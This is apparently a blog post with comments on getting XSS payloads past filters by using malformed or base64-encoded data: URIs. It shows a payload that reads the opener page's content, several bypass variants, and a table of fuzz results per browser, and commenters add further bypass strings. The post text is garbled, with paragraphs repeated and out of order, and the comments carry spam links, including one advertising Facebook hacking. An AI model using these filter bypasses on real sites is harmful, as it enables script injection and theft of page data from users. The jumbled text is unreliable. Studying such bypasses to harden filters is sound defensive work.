Data URLs, especially in their base64 encoding can often be used for anti XSS filter bypasses. This gets even more important in Firefox and Opera, where newly opened documents retain access to opening page. So attacker can trigger XSS with only this semi-innocent-link:
But what if particular XSS filter knows about data: URIs and tries to reject them? We bypass, of course :) I've been fuzzing data: URIs syntax recently and I just thought you might find below examples interesting:
Here are full fuzz results for vector:
data:text,html;<before>base64<after>,[base64content]
<a target=_blank href="data:text/html,<script>alert(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a>or even use the base64 encoding of the URL:
data:text/html;base64,PHNjcmlwdD5hbGVydChvcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrMTApPC9zY3JpcHQ+Chrome will block the access to originating page, so that attacker has limited options:
But what if particular XSS filter knows about data: URIs and tries to reject them? We bypass, of course :) I've been fuzzing data: URIs syntax recently and I just thought you might find below examples interesting:
data:text/html;base64wakemeupbeforeyougogo,[content] // FF, Safari data:text/html:;base64,[content] data:text/html:[plenty-of-whitespace];base64,[content] data:text/html;base64,,[content] // Opera
Here are full fuzz results for vector:
data:text,html;<before>base64<after>,[base64content]
Browser | Before (ASCII) | After (ASCII) |
---|---|---|
Firefox 11 | 9,10,13,59 | anything |
Safari 5.1 | 9,10,13,59 | anything |
Chrome 18 | 9,10,13,32,59 | 9,10,13,32,59 |
Opera 11.6 | 9,10,13,32,59 | 9,10,13,32,44,59 |
Not a ground-breaking result, but it may come in handy one day for you, like it did for me.
5 comments:
data:_,alert(/i/)//firefox
data:text/html;base64,<<<<<<<>>>>>>>>> //opera
Hi dear! Wish you are doing
excellent, well awesome information and facts. I must say...really demonstrated
& deserving to study.
http://www.marsleisure.com
Hey! Cool Information, many thanks
for sharing this valuable knowledge. I really like it.
http://www.gardendecors.net
I am reviewing Adblock Plus for possible attack points nevertheless and already added frame busting code to HTML pages - just in case. Hack Facebook
http://www.fbpiraterfr.com/
http://gadgetspeaks.com/
http://aadhaarcarduid.org/
http://cheatjunction.com/hay-day-diamond-hack-cheats/
Post a Comment